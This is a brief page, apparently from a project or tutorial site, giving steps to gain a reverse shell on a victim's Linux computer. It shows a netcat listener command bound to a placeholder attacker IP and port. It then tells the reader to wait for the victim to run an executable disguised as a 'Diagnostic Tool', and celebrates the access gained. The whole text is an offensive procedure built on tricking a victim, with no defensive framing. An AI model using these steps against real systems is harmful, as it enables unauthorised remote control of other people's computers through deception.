Skip to the content.

Gain access to victim’s computer with reverse shell

  1. On attacker’s computer (Linux with netcat installed), run the following if
    • victim is using linux (our case)
       $ sudo nc -lnvp PORT_NUMBER -s ATTACKERS_IP_ADDRESS
      
  2. Wait for the victim to run the ‘Diagnostic Tool’ executable file:
  3. Boom! Access granted!